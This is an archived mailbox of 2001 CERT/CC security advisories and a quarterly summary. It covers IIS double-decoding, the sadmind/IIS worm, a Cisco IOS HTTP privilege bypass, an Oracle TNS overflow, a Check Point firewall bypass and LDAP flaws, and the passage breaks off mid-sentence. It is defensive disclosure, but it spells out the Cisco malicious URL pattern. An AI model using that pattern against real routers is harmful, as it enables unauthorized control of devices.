+1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History May 08, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOvd6LAYcfu8gsZJZAQFyUAP8DVaGiB1G7LM2FFsx5YEWEIPFD8Qt/HDI A+GTyi/LA2JUAVCA5GX5GCMqMOoKEczYJCAIysoacal7YOJOTZliTqCQQV1tbK+8 8J3IdSRBo5oKsAKeQ5M2Hg78uZPGJwOwooNoQDsKzxVJXo0Bng3YBtiIVG3flg6x 8IoirGdclIw= =+B8w -----END PGP SIGNATURE----- From - Tue May 15 12:35:15 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f4FJP9O13898; Tue, 15 May 2001 12:25:09 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id LAA19379; Tue, 15 May 2001 11:11:38 -0400 (EDT) Date: Tue, 15 May 2001 11:11:38 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 15 May 2001 11:06:56 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-12 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: d928562cf9462ea2b2a4e027446462b7 Status: RO X-Status: X-Keywords: X-UID: 9 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-12 Superfluous Decoding Vulnerability in IIS Original release date: May 15, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running Microsoft IIS Overview A serious vulnerability in Microsoft IIS may allow remote intruders to execute commands on an IIS web server. This vulnerability closely resembles a previous vulnerability in IIS that was widely exploited. The CERT/CC urges IIS administrators to take action to correct this vulnerability. I. Description URIs may be encoded according to RFC 2396. Among other things, this RFC provides an encoding for arbitrary octets using the percent sign (%) and hexadecimal characters. Quoting from RFC 2396: An escaped octet is encoded as a character triplet, consisting of the percent character "%" followed by the two hexadecimal digits representing the octet code. For example, "%20" is the escaped encoding for the US-ASCII space character. escaped = "%" hex hex hex = digit | "A" | "B" | "C" | "D" | "E" | "F" Like all web servers, Microsoft IIS decodes input URIs to a canonical format. Thus, the following encoded string: A%20Filename%20With%20Spaces will get decoded to A Filename With Spaces Unfortunately, IIS decodes some of the input twice. The second decoding is superfluous. Security checks are applied to the results of the first decoding, but IIS utilizes the results of the second decoding. If the results of the first decoding pass the security checks and the results of the second decoding refer to a valid file, access will be granted to the file even if it should not be. More information is available at http://www.microsoft.com/technet/security/bulletin/MS01-026.asp http://www.nsfocus.com/english/homepage/sa01-02.htm http://www.kb.cert.org/vuls/id/789543 Note that this does not permit intruders to bypass ACLs enforced by the filesystem, only security checks performed by IIS. We encourage you to configure your web server according to the guidelines provided in http://www.microsoft.com/technet/security/iis5chk.asp http://www.microsoft.com/technet/security/iischk.asp http://www.microsoft.com/technet/security/tools.asp Theses guidelines can help you reduce your exposure to this problem, and possibly to problems that have not yet been discovered. This issue was discovered by NSFocus. The CVE Project has assigned the following identifier to this vulnerability: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0333 This vulnerability has many similarities to the Web Server Folder Directory Traversal Vulnerability, which has been widely exploited. For more information on that vulnerability, see http://www.kb.cert.org/vuls/id/111677 II. Impact Intruders can run arbitrary commands with the privileges of the IUSR_machinename account. III. Solutions Apply a patch from your vendor Information on patches from Microsoft is available at http://www.microsoft.com/technet/security/bulletin/MS01-026.asp Additional advice on securing IIS web servers is available from http://www.microsoft.com/technet/security/iis5chk.asp http://www.microsoft.com/technet/security/tools.asp Appendix A. Vendor Information Microsoft Corporation The following documents regarding this vulnerability are available from Microsoft: http://www.microsoft.com/technet/security/bulletin/MS01-026.asp Authors: Shawn Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-12.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History May 15, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOwFD9wYcfu8gsZJZAQEc0AP6A7XLQiQ7to6uzTeOyFRb+vXUBI1zBmT1 TvVwLodq6wfeS0vG/+Ta0KC28CFthDs9vUrw6HTnVeeFilKRqUhPgR8Izgd56ePc SKalqxv41DRvkusTlvrygFw1IUzdCJ0/EzWUiRpqu1QV7ZWmNTTVG4ycoEM++cLh 67h5IqMR/iU= =z3yR -----END PGP SIGNATURE----- From - Tue May 29 16:03:18 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f4TMsAB13115; Tue, 29 May 2001 15:54:10 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA20018; Tue, 29 May 2001 16:49:27 -0400 (EDT) Date: Tue, 29 May 2001 16:49:27 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 29 May 2001 16:44:44 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2001-02 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: d1d6c17acfa8dea020395d17b151ae05 Status: RO X-Status: X-Keywords: X-UID: 10 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2001-02 May 29, 2001 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in February 2001 (CS-2001-01), we have seen a significant increase in reconnaissance activity, a number of self-propagating worms, and active exploitation of vulnerabilities in snmpxdmid, BIND and IIS by intruders For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. sadmind/IIS Worm The CERT/CC has received reports from more than 400 sites affected by a piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). This worm uses two well-known vulnerabilities to compromise Solaris systems and deface web pages running on IIS servers. Reports indicate more than 500 Solaris machines have been compromised by the sadmind/IIS worm and more than 6000 IIS servers have been defaced. Sites running either Solaris or IIS are strongly encouraged to review CA-2001-11 and those running IIS should review the advisories listed below in the "Other Recent IIS Security Issues" section as well. CERT Advisory CA-2001-11: sadmind/IIS Worm http://www.cert.org/advisories/CA-2001-11.html 2. Other Recent IIS Security Issues The CERT/CC has recently published information on two new vulnerabilities in IIS. Given the current level of exploitation of IIS by intruders and the sadmind/IIS worm, the CERT/CC strongly encourages sites to review the following advisories and take appropriate steps to protect IIS servers. + Superfluous Decoding Vulnerability in IIS A serious vulnerability in Microsoft IIS may allow remote intruders to execute commands on an IIS web server. This vulnerability closely resembles a previous vulnerability in IIS that was widely exploited. The CERT/CC urges IIS administrators to take action to correct this vulnerability. CERT Advisory CA-2001-12: Superfluous Decoding Vulnerability in IIS http://www.cert.org/advisories/CA-2001-12.html + Buffer Overflow Vulnerability in Microsoft IIS 5.0 A vulnerability exists in Microsoft IIS 5.0 running on Windows 2000 that allows a remote intruder to run arbitrary code on the victim machine, allowing them to gain complete administrative control of the machine. A proof-of-concept exploit is publicly available for this vulnerability, which increases the urgency that system administrators apply the patch. CERT Advisory CA-2001-10: Buffer Overflow Vulnerability in Microsoft IIS 5.0 http://www.cert.org/advisories/CA-2001-10.html Additional advice on securing IIS web servers is available from: Microsoft Technet Security Tools http://www.microsoft.com/technet/security/tools.asp 3. Exploitation of snmpXdmid The CERT/CC has received dozens of reports indicating that a vulnerability in snmpXdmid is being actively exploited. Exploitation of this vulnerability allows an intruder to gain privileged (root) access to the system. CERT Advisory CA-2001-05: Exploitation of snmpXdmid http://www.cert.org/advisories/CA-2001-05.html 4. Exploitation of BIND Vulnerabilities On January 29, 2001, the CERT/CC published CERT Advisory CA-2001-02, detailing multiple vulnerabilities in multiple versions of ISC BIND nameserver software. Two of the vulnerabilities described in the advisory are still being actively exploited by the intruder community to compromise systems. CERT Incident Note IN-2001-03: Exploitation of BIND Vulnerabilities http://www.cert.org/incident_notes/IN-2001-03.html CERT Advisory CA-2001-02: Multiple Vulnerabilities in BIND http://www.cert.org/advisories/CA-2001-02.html 5. The "cheese" Worm The CERT/CC has observed in public and private reports a recent pattern of activity surrounding probes to TCP port 10008. We have obtained an artifact called the "cheese" worm which may contribute to this pattern. CERT Incident Note IN-2001-05: The "cheese" Worm http://www.cert.org/incident_notes/IN-2001-05.html 6. Increase in Reconnaissance Activity Over the past several weeks, the CERT/CC has observed a significant increase in network reconnaissance activity. While some of this traffic may be attributed to the sadmind/IIS worm or the "cheese" worm, reports indicate active scanning for known vulnerabilities in other network services as well. In addition, we have seen a significant increase in the number of generalized port scans of hosts. In order to minimize exposure to this activity, the CERT/CC recommends that sites review and apply vendor-supplied security patches, disable non-critical network services, and actively monitor system and network logs for unusual activity. 7. Statistical Weaknesses in TCP/IP Initial Sequence Numbers A new vulnerability has been identified which is present when using random increments to constantly increase TCP ISN values over time. Systems are vulnerable if they have not incorporated RFC 1948 or equivalent improvements, or do not use cryptographically secure network protocols like IPsec. CERT Advisory CA-2001-09: Statistical Weaknesses in TCP/IP Initial Sequence Numbers http://www.cert.org/advisories/CA-2001-09.html _________________________________________________________________ Collaboration between the CERT Coordination Center and the Internet Security Alliance Using its standard process for collaborating with industry organizations, the CERT/CC, as part of the SEI, has entered into an agreement with the Electronic Industries Alliance, a not-for-profit organization in Virginia, to support the activity of the Internet Security Alliance (ISA). ISA is a member organization that is focused on the overall improvement of Internet security. Internet Security Alliance http://www.isalliance.org Frequently Asked Questions (FAQ) about the collaboration between CERT Coordination Center and the Internet Security Alliance http://www.cert.org/faq/certcc_ISA.html _________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Incident Notes http://www.cert.org/incident_notes/ * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Annual Reports http://www.cert.org/annual_rpts/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2001-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2001 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOxQFvgYcfu8gsZJZAQGhBwQAnOGWyK2i3snaTskm3SvFycSFQCIhatKI 0+UrWPAX4oR5dYcygJwg23/QSuN2deQuLatfJSRKHW+hYKVgJlHxoBED0CPspkhx ezU47UcqLFKk2QI3Bt3cG22i28qxjpEOZNn325MfrxJg/q2XdUFZcpqkdian5otJ Lv+z0JyeV/M= =I/U5 -----END PGP SIGNATURE----- From - Thu Jun 28 11:22:34 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f5SIE3i20196; Thu, 28 Jun 2001 11:14:03 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id LAA28669; Thu, 28 Jun 2001 11:28:08 -0400 (EDT) Date: Thu, 28 Jun 2001 11:28:08 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 28 Jun 2001 11:21:08 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-14 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: de4d45cc77b338e8001e59640cfa6b62 Status: RO X-Status: X-Keywords: X-UID: 11 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-14 Cisco IOS HTTP Server Authentication Vulnerability Original release date: June 28, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Cisco IOS systems using local authentication databases with the HTTP server enabled Overview A problem with the HTTP server component of Cisco IOS system software allows an intruder to execute privileged commands on Cisco routers if local authentication databases are used. I. Description By sending a particular URL to a Cisco IOS device with the HTTP server enabled, a remote attacker may be able to execute commands at the highest privilege level (15). The malicious URL is of the following form: http://
/level/XX/exec/... The value of XX is a number between 16 and 99. While a single malicious URL will not work consistently against all devices, the limited number of possible URLs can allow an attacker to try each URL until the attack succeeds. This problem occurs if the system is using a local authentication database, but not if the Terminal Access Controller Access Control System (TACACS+) or Radius authentication systems are used. Cisco has published a security advisory describing this vulnerability and its solutions, in more detail at: http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html II. Impact A remote attacker can execute arbitrary commands at the highest privilege level (15) on systems using local authentication databases with the HTTP server enabled. This access allows a remote attacker to inspect or change the configuration of the device, effectively allowing complete control. III. Solution Upgrade your IOS Release Cisco has published detailed information about upgrading affected Cisco IOS software to correct this vulnerability. System managers are encouraged to upgrade to one of the non-vulnerable releases. Disable the HTTP server Because this problem exists in the handling of HTTP requests, disabling the HTTP server prevents the vulnerability from being exploited. Information about disabling the HTTP server is provided in the Cisco security advisory on this topic. Enable TACACS+ or Radius Authentication This vulnerability is not present when the Terminal Access Controller Access Control System (TACACS+) or Radius authentication systems are used. Enabling one of these authentication mechanisms in place of local authorization databases will prevent the vulnerability from being exploited. Information about enabling TACACS+ or Radius can be found in the following Cisco document: http://www.cisco.com/warp/public/480/tacplus.shtml Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Cisco Systems Cisco has published a security advisory describing this vulnerability at http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html _________________________________________________________________ The CERT/CC thanks Cisco Systems for their advisory, on which this document is based. _________________________________________________________________ Author: Cory F. Cohen ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-14.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History June 28, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOztJpAYcfu8gsZJZAQFoOgP/UBtU8yqFbhHf/xD82wCewpBi6NhBAk2M 66WLouQrnXIMWzRWnLmRNV74p+7u+92IxFS/u+TqTzIfByUOtwXLswcRRvHlXYXk 511yHK01wlfgtgv7wwg8doYyCUGPamznNnVEAnbZ/9zoM6Y1nuvUEUgOnvvT9ZMu sCRihIv2WGg= =THYA -----END PGP SIGNATURE----- From - Tue Jul 3 17:45:34 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f640h6Z06239; Tue, 3 Jul 2001 17:43:06 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id RAA21344; Tue, 3 Jul 2001 17:36:22 -0400 (EDT) Date: Tue, 3 Jul 2001 17:36:22 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 3 Jul 2001 17:31:24 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-16 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 1203b7da17eefdd4ba3eff2c30537dd8 Status: RO X-Status: X-Keywords: X-UID: 12 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-16 Oracle 8i contains buffer overflow in TNS listener Original release date: July 03, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running Oracle 8i Overview A vulnerability in Oracle 8i allows remote intruders to assume control of database servers running on victim machines. If the Oracle server is running on a Windows system, an intruder may also be able to gain contol of the underlying operating system. I. Description The COVERT labs at PGP Security have discovered a buffer overflow vulnerability in Oracle 8i that allows intruders to execute arbitrary code with the privileges of the TNS listener process. The vulnerability occurs in a section of code that is executed prior to authentication, so an intruder does not require a username or password. For more information, see the COVERT Labs Security Advisory, available at http://www.pgp.com/research/covert/advisories/050.asp II. Impact An intruder who exploits the vulnerability can remotely execute arbitrary code. On UNIX systems, this code runs as the 'oracle' user. If running on Windows systems, the intruder's code will run in the Local System security context. In either case, the attacker can gain control of the database server on the victim machine. On Windows systems, the intruder can also gain administrative control of the operating system. III. Solutions Install a patch from Oracle. More information is available in Appendix A. Appendix A Oracle Oracle has issued an alert for this vulnerability at http://otn.oracle.com/deploy/security/pdf/nai_net8_bof.pdf Oracle has fixed this potential security vulnerability in the Oracle9i database server. Oracle is in the process of backporting the fix to supported Oracle8i database server Releases 8.1.7 and 8.1.6 and Oracle8 Release 8.0.6 on all platforms. The Oracle bug number for the patch is 1489683. Download the patch for your platform from Oracle's Worldwide Support web site, Metalink: http://metalink.oracle.com Please check Metalink periodically for patch availability if the patch for your platform is not yet available. _________________________________________________________________ Our thanks to COVERT Labs at PGP Security for the information contained in their advisory. _________________________________________________________________ This document was written by Shawn V. Hernan. If you have feedback concerning this document, please send email to: mailto:cert@cert.org?Subject=[VU#620495]%20Feedback%20CA-2001-16 Copyright 2001 Carnegie Mellon University. Revision History July 03, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO0I28QYcfu8gsZJZAQF1AQP/QvE4AO+I5HP8VXK850g83NlPiFCxlG1K 51GjO/KCFqK78DoBK9YWvxGaZiR6xKaxYJbGftcJh1zKwNqiRDIGk1OdeW873uhj bR8vjobFMzNSZU5y9gXPa9YQWdEg1KozQH1VuNsBxRnmHu6Yi3WANbmZXYcRck2x lhP8noPes/Q= =nVFt -----END PGP SIGNATURE----- From - Mon Jul 9 13:10:52 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f69K8mF04341; Mon, 9 Jul 2001 13:08:49 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id NAA16657; Mon, 9 Jul 2001 13:35:09 -0400 (EDT) Date: Mon, 9 Jul 2001 13:35:09 -0400 (EDT) Received: by canaveral.red.cert.org; Mon, 9 Jul 2001 13:30:01 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-17 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: ced08c93acc5a0ee91a60ec8d33b2d05 Status: RO X-Status: X-Keywords: X-UID: 13 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-17 Check Point RDP Bypass Vulnerability Original release date: July 09, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Check Point VPN-1 and FireWall-1 Version 4.1 Overview A vulnerability in Check Point FireWall-1 and VPN-1 may allow an intruder to pass traffic through the firewall on port 259/UDP. I. Description Inside Security GmbH has discovered a vulnerability in Check Point FireWall-1 and VPN-1 that allows an intruder to bypass the firewall. The default FireWall-1 management rules allow arbitrary RDP (Reliable Data Protocol) connections to traverse the firewall. RFC-908 and RFC-1151 describe the Reliable Data Protocol (RDP). Quoting from RFC-908: The Reliable Data Protocol (RDP) is designed to provide a reliable data transport service for packet-based applications such as remote loading and debugging. RDP was designed to have much of the same functionality as TCP, but it has some advantages over TCP in certain situations. FireWall-1 and VPN-1 include support for RDP, but they do not provide adequate security controls. Quoting from the advisory provided by Inside Security GmbH: By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall. For more information, see the Inside Security GmbH security advisory, available at http://www.inside-security.de/advisories/fw1_rdp.html Although the CERT/CC has not seen any incident activity related to this vulnerability, we do recommend that all affected sites upgrade their Check Point software as soon as possible. II. Impact An intruder can pass UDP traffic with arbitrary content through the firewall on port 259 in violation of implied security policies. If an intruder can gain control of a host inside the firewall, he may be able to use this vulnerability to tunnel arbitrary traffic across the firewall boundary. Additionally, even if an intruder does not have control of a host inside the firewall, he may be able to use this vulnerability as a means of exploiting another vulnerability in software listening passively on the internal network. Finally, an intruder may be able to use this vulnerability to launch certain kinds of denial-of-service attacks. III. Solutions Install a patch from Check Point Software Technologies. More information is available in Appendix A. Until a patch can be applied, you may be able to reduce your exposure to this vulnerability by configuring your router to block access to 259/UDP at your network perimeter. Appendix A Check Point Check Point has issued an alert for this vulnerability at http://www.checkpoint.com/techsupport/alerts/ Download the patch from Check Point's web site: http://www.checkpoint.com/techsupport/downloads.html Appendix B. - References 1. http://www.inside-security.de/advisories/fw1_rdp.html 2. http://www.kb.cert.org/vuls/id/310295 3. http://www.ietf.org/rfc/rfc908.txt 4. http://www.ietf.org/rfc/rfc1151.txt _________________________________________________________________ Our thanks to Inside Security GmbH for the information contained in their advisory. _________________________________________________________________ This document was written by Ian A. Finlay. If you have feedback concerning this document, please send email to: mailto:cert@cert.org?Subject=Feedback CA-2001-17 [VU#310295] Copyright 2001 Carnegie Mellon University. Revision History July 09, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO0njBQYcfu8gsZJZAQHOCAP+L8JEWTsWqvWjZQaVpHPb6GHn7D837lzc rE/ef50+6xSzRZyBPXQ8+3N6JqYk8PBufYCcqtiqL1PfNJw3YfrGJ5irzS4ENXTg mupUNTfdG0UhEAOWJbsjykfB0K/PPaeFrtf1jod1zd9uKPIFytHLAzMHWzUwTTtW 4qSlIxoiHEQ= =v8vs -----END PGP SIGNATURE----- From - Tue Jul 17 09:31:42 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f6H64lL22911; Mon, 16 Jul 2001 23:04:47 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id AAA17429; Tue, 17 Jul 2001 00:43:29 -0400 (EDT) Date: Tue, 17 Jul 2001 00:43:29 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 17 Jul 2001 00:38:35 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-18 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 3c4e250d63a8f4cd691befe40f18c9aa Status: RO X-Status: X-Keywords: X-UID: 14 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-18 Multiple Vulnerabilities in Several Implementations of the Lightweight Directory Access Protocol (LDAP) Original release date: July 16, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * iPlanet Directory Server, version 5.0 Beta and versions up to and including 4.13 * Certain versions of IBM SecureWay running under Solaris and Windows 2000 * Lotus Domino R5 Servers (Enterprise, Application, and Mail), prior to 5.0.7a * Teamware Office for Windows NT and Solaris, prior to version 5.3ed1 * Qualcomm Eudora WorldMail for Windows NT, version 2 * Microsoft Exchange 5.5 LDAP Service (Hotfix pending) * Network Associates PGP Keyserver 7.0, prior to Hotfix 2 * Oracle 8i Enterprise Edition * OpenLDAP, 1.x prior to 1.2.12 and 2.x prior to 2.0.8 Overview Several implementations of the Lightweight Directory Access Protocol (LDAP) protocol contain vulnerabilities that may allow denial-of-service attacks, unauthorized privileged access, or both. If your site uses any of the products listed in this advisory, the CERT/CC encourages you to follow the advice provided in the Solution section below. I. Description The LDAP protocol provides access to directories that support the X.500 directory semantics without requiring the additional resources of X.500. A directory is a collection of information such as names, addresses, access control lists, and cryptographic certificates. Because LDAP servers are widely used in maintaining corporate contact information and providing authentication services, any threats to their integrity or stability can jeopardize the security of an organization. To test the security of protocols like LDAP, the PROTOS project presents a server with a wide variety of sample packets containing unexpected values or illegally formatted data. This approach may reveal vulnerabilities that would not manifest themselves under normal conditions. As a member of the PROTOS project consortium, the Oulu University Secure Programming Group (OUSPG) co-developed and subsequently used the PROTOS LDAPv3 test suite to study several implementations of the LDAP protocol. The PROTOS LDAPv3 test suite is divided into two main sections: the "Encoding" section, which tests an LDAP server's response to packets that violate the Basic Encoding Rules (BER), and the "Application" section, which tests an LDAP server's response to packets that trigger 